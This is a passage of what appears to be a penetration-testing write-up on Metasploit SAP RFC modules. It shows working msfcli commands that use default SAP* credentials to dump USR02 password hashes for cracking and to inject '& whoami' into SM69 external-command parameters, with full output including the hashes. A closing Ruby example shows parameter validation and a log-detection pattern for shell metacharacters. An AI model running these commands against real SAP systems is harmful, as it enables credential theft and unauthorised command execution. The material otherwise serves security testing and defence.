[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Below the module is being used to execute the DBMCLI command to connect to the database with parameters extracted from the .XUSER.62 file. No credentials are provided as the OS user has access to the .XUSER.62 file and is a ‘trusted’ user.

The SQL command executed extracts the hashes for all users across all clients. These can be cracked by john-the-ripper.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001
  CMD=DBMCLI OS=1 PARAM="-d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: DBMCLI -d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02

[SAP] Command Exec
==================

   Output
   ------
   000;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
   000;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480'
   000;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000'
   000;TMSADM;x'942B9DC0F2394D85';x'C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF'
   001;ADSUSER;x'7FE24F5321515E7F';x'CD83AD9E92B4E37E2255FEA11AC82234BA825FBD'
   001;ADS_AGENT;x'8C32369322B732F6';x'FE0DD787EE7EBCBF4728BDC1A865A6F15B064611'
   001;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
   001;DEVELOPER;x'C4C768AEB4A99EF5';x'4BD353A8F1D8B453D58910CC87D24B0C1C9A9011'
   001;J2EE_ADMIN;x'6C1541BC997289D1';x'149E781A80383CC59AB04E88B51832819403364F'
   001;J2EE_GUEST;x'0000000000000000';x'0000000000000000000000000000000000000000'
   001;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480'
   001;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000'
   001;SAPJSF;x'7D6762BFB7504CA4';x'93738A70AA83C6DAA6CD0B3B1853986333A29192'
   066;EARLYWATCH;x'BD5E494D3ECBF5E2';x'0000000000000000000000000000000000000000'
   066;SAP*;x'29B60B2614510C1D';x'789C6E939E7BD99A554D79ABC214910A502EE407'
   END
   OK

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

1.3. Arbitrary Command Execution

On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands. Notice the command injection PARAM="C:\\\windows\\\win.ini & whoami" and the result below.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=192.168.1.20 RPORT=3300 USER=SAP* PASS=06071992 CLIENT=001
  CMD="DISPLAY_DIAGLOG" OS=3 PARAM="C:\\\windows\\\win.ini & whoami" E

[+] 192.168.1.20:3300 [SAP] Successful login - 001:SAP*:06071992

[SAP] Command Exec
==================

   Output
   ------
   ; for 16-bit app support
   MAPI=1
   [Mail]
   [extensions]
   [files]
   [fonts]
   [mci extensions]
   gateway\administrator

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_sxpg_call_system auxiliary module

This module makes use of the SXPG_CALL_SYSTEM Remote Function Call to execute OS commands as configured in SM69. A number of OS commands are preconfigured on SAP installs within SM69. Below the module is executing the LIST_DB2DUMP command on a Windows system to view the directory listing of the c:\ drive.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_call_system RHOSTS=192.168.1.20 RPORT=3300 USER=SAP* PASS=06071992 CLIENT=001
  CMD=LIST_DB2DUMP OS=3 PARAM="c:\\" E

[+] 192.168.1.20:3300 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP c:\

[SAP] Command Exec
==================

   Output
   ------
   
   
   05/21/2011  12:13 AM             1,830 unattend.xml
   05/22/2011  09:04 PM    <DIR>          sqlinstall
   05/22/2011  10:02 PM               176 completesql.cmd
   05/23/2011  01:23 AM             8,150 sqlcompleteconfig.ini
   07/14/2009  03:20 AM    <DIR>          PerfLogs
   10/27/2011  11:34 PM    <DIR>          Users
   10/27/2011  11:35 PM    <DIR>          Program Files
   10/28/2011  08:28 AM    <DIR>          Windows
   10/28/2011  08:29 AM    <DIR>          Program Files (x86)
   3 File(s)         10,156 bytes
   6 Dir(s)  16,145,256,448 bytes free
   Directory of c:\
   Volume Serial Number is 6450-5096
   Volume in drive C has no label.

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

On Windows systems configured commands that accept additional parameters can be manipulated to execute arbitrary commands. Notice the command injection PARAM="c:\\ & whoami" and the result below.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_call_system RHOSTS=192.168.1.20 RPORT=3300 USER=SAP* PASS=06071992 CLIENT=001
  CMD=LIST_DB2DUMP OS=3 PARAM="c:\\ & whoami" E

[+] 192.168.1.20:3300 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP c: & whoami

[SAP] Command Exec
==================

   Output
   ------
   
   
   03/17/2012  08:23 PM    <DIR>          Program Files
   03/17/2012  08:39 PM    <DIR>          Windows
   05/21/2011  12:13 AM             1,830 unattend.xml
   05/22/2011  09:04 PM    <DIR>          sqlinstall
   05/22/2011  10:02 PM               176 completesql.cmd
   05/23/2011  01:23 AM             8,150 sqlcompleteconfig.ini
   07/14/2009  03:20 AM    <DIR>          PerfLogs
   10/27/2011  11:34 PM    <DIR>          Users
   10/28/2011  08:29 AM    <DIR>          Program Files (x86)
   3 File(s)         10,156 bytes
   6 Dir(s)  17,953,746,944 bytes free
   Directory of C:\
   Volume Serial Number is 6450-5096
   Volume in drive C has no label.
   gateway\administrator

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
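Both the "Arbitrary Command Execution" section above and this sxpg_call_system run show the same root cause: the additional parameter is appended to a command line that a shell parses, so "& whoami" becomes a second command. The following Ruby is an added example, not the MWR module's code and not SAP's implementation of SM69: it models an external-command definition with its "additional parameters allowed" flag, shows the unchecked concatenation beside a checked version that rejects shell metacharacters and returns an argv for a shell-free exec, and flags "Command Executed" lines whose parameter carries such characters. The ExternalCommand struct, the OS command strings and the SHOW_VERSION entry are constructed for illustration; the log sample reuses lines from this page.

```ruby
# Added example (not MWR's or SAP's code): why SM69 "additional parameters"
# become arbitrary command execution, and the check that stops it.
# Command definitions below are constructed; the real ones live in transaction SM69.

ExternalCommand = Struct.new(:name, :os_command, :additional_params_allowed)

# Constructed definitions: LIST_DB2DUMP mirrors the command used on this page
# (its OS command string is assumed); SHOW_VERSION is invented for contrast.
SM69_COMMANDS = {
  'LIST_DB2DUMP' => ExternalCommand.new('LIST_DB2DUMP', 'dir', true),
  'SHOW_VERSION' => ExternalCommand.new('SHOW_VERSION', 'ver', false),
}.freeze

# Characters cmd.exe or a POSIX shell treat as separators, pipes, redirection or expansion.
SHELL_METACHARACTERS = /[&|;<>`$()\r\n]/

# Unchecked: the parameter is glued onto a string a shell will parse, so
# "c:\ & whoami" runs dir and then whoami with the gateway's privileges.
def command_line_unchecked(defn, param)
  "#{defn.os_command} #{param}".rstrip
end

# Checked: refuse parameters the definition does not allow, refuse anything a
# shell would interpret, and return argv so the caller can exec without a shell.
def command_argv_checked(defn, param)
  param = param.to_s.strip
  unless param.empty?
    return [:rejected, 'additional parameters not allowed for this command'] unless defn.additional_params_allowed
    return [:rejected, 'parameter contains shell metacharacters'] if param.match?(SHELL_METACHARACTERS)
  end
  argv = [defn.os_command]
  argv << param unless param.empty?
  [:ok, argv]
end

# Constructed log sample made of "Command Executed" lines from this page.
SAMPLE_LOG = <<~LOG
  [+] Command Executed: LIST_DB2DUMP /etc/passwd
  [+] Command Executed: CAT /etc/passwd
  [+] Command Executed: LIST_DB2DUMP c: & whoami
LOG

# Lines whose parameter part contains shell metacharacters: worth an alert
# wherever external-command executions are logged.
def suspicious_command_lines(log)
  log.each_line
     .select { |l| l =~ /Command Executed: \S+ (.*)$/ && Regexp.last_match(1).match?(SHELL_METACHARACTERS) }
     .map(&:strip)
end

if __FILE__ == $PROGRAM_NAME
  defn = SM69_COMMANDS['LIST_DB2DUMP']
  puts command_line_unchecked(defn, 'c:\\ & whoami')
  p command_argv_checked(defn, 'c:\\ & whoami')
  p command_argv_checked(defn, 'c:\\')
  puts suspicious_command_lines(SAMPLE_LOG)
end
```

The flag on the struct corresponds to the "additional parameters allowed" setting of an SM69 definition, and access to external commands is governed by the S_LOG_COM authorization object; the metacharacter check and the argv form are the parts this example adds, since a command that takes a path should never need a shell to run it.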